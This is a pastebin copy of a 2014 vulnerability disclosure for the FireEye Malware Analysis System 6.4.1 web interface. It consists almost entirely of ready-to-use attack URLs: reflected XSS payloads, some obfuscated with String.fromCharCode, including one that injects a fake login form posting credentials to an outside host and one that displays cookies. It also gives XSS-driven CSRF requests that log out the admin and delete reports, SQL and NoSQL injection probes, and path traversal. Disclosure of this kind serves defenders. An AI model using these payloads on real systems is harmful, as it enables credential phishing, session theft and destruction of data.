Bugabuse.Net Pastebin

Untitled

From Jittery Owl, 1 Year ago, written in Plain Text, viewed 119 times.
URL https://paste.bugabuse.net/view/029c12e5 Embed
Download Paste or View Raw
  1. # Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities
  2. # Google Dork: none
  3. # Date: 06/05/2014
  4. # Exploit Author: kmkz (Bourbon Jean-Marie)
  5. # Vendor Homepage: http://www.fireeye.com/fr/fr/
  6. # Software Link: http://www.fireeye.com/products-and-solutions/
  7. # Version: 6.4.1
  8. # CVE : none
  9.  
  10. *************************************************************
  11. *[Audit Type] web IHM ONLY / Full black-box audit                   *
  12. *                                                                                                                   *
  13. *[Multiples Vulnerabilities]                                                        *
  14. *                                                                                                                   *
  15. *       3 XSS (reflected)                                                                           *
  16. *       1 CSRF                                                                                              *
  17. *       1 NoSQLi (Json object)                                                              *
  18. *       1 PostGreSQL SQLi (Exploitable?)                                            *
  19. *       1 File and Path Disclosure                                                          *
  20. *       1 Source code Info-leak                                                             *
  21. *                                                                                                                   *
  22. *************************************************************
  23.  
  24.  
  25.  
  26. [*] XSS:
  27.         +First XSS (reflected):
  28.                 https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>
  29.         PoC :
  30.                 Redirection:
  31.                         https://192.168.1.50/yara/show_ya_file?name=<body
  32. onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
  33.                 Url encoded redirection payload:
  34.                         https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09
  35.  
  36.                 Phishing page PoC:
  37.                         https://192.168.1.50/yara/show_ya_file?name=<body
  38. onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
  39.                 Url encoded phishing page payload:
  40.                         https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E
  41.         +Second XSS (reflected):
  42.                 https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
  43.         +Third XSS (reflected):
  44.                 https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
  45. Show Cookie PoC:
  46.                         https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn
  47.  
  48. [*] CSRF:
  49.  
  50.         PoC:
  51.                 admin logout:
  52.                         https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>
  53.                 Url encoded admin deconnexion PoC:
  54.                         https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
  55.                 Report deleting:
  56.                         https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>
  57.                 Url encoded report deleting Poc:
  58.                         https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
  59. [*] SQLi  PostGreSQL (Exploitable?):
  60.         https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2
  61. FROM events /**
  62.  
  63.         output:
  64.                 Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.
  65. Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
  66.         https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999       Output:
  67.             Event ID '99999999999' could not be retrieved.
  68.             PG::Error: ERROR: value "99999999999" is out of range for type
  69. integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1
  70.  
  71.  
  72. [*] Files & Directory Disclosure:
  73.         https://192.168.1.50/malware_analysis/ma_repo : the Input Path field
  74. allow Path & file disclosure ../../../../../../../bin/sh (example)
  75.  
  76.  
  77. {*] Others:
  78.         1)No SQLi (Json)
  79. https://192.168.1.50/network/network?new_domain[$ne]=blah
  80.         Return: {"$ne"=>"blah"} is not a valid host // Exploitable?
  81.         2)Source code Info-leak:
  82.                 https://192.168.1.50/manual/csc?mode=%3C/script%3E
  83.  
  84. --
  85. kmkz
  86. PGP: B24EAF34

Reply to "Untitled"

Here you can reply to the paste above

Powered by Stikked